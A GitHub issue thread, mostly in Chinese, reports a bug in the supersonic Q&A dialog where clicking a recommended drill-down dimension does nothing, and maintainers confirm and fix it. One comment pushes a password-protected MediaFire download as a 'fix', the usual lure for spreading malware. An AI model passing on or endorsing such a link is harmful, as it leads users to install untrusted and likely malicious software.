### ISSUE TITLE
[Bug] 【问答对话】算指标对话框点击问答推荐下钻维度无响应变化

### ISSUE THREAD

**Issue by antClimb** [tencentmusic/supersonic#1605]
### Search before asking

- [X] I had searched in the [issues](https://github.com/tencentmusic/supersonic/issues?q=is%3Aissue) and found no similar issues.

### Version

v0.9.6

### What's Wrong?

<img width="984" alt="2024-08-26_181531" src="https://github.com/user-attachments/assets/1401ee77-d23f-4a4c-a95f-c4c38bd695fb">

### What You Expected?

点击推荐下钻维度能按正常维度展示

### Are you willing to submit PR?

- [ ] Yes I am willing to submit a PR!

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://www.apache.org/foundation/policies/conduct)

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jerryjzhang** [comment]
复现了问题，需要定位修复

**Comment by lxwcodemonkey** [comment]
我修复下

**Comment by jipeli** [comment]
#1666

**Comment by tzcyssy** [comment]
问答的时候,指标配置的有下钻  为什么查询出来 下钻的维度展示不出来呀。
